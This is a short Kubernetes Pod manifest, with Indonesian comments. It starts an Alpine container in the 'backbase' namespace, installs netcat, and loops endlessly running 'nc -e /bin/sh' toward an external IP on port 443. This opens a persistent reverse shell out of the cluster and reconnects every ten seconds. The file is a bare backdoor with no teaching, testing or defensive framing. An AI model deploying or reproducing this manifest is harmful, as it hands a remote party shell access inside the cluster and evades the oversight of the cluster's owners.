apiVersion: v1
kind: Pod
metadata:
  name: auto
  namespace: backbase
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["/bin/sh"]
    args:
    - -c
    - |
      apk add --update netcat-openbsd
      while true; do
        echo "=== Mencoba konek ke VPS ==="
        nc -v 203.175.125.130 443 -e /bin/sh || echo "Gagal, coba lagi 10 detik"
        sleep 10
      done
  restartPolicy: Never
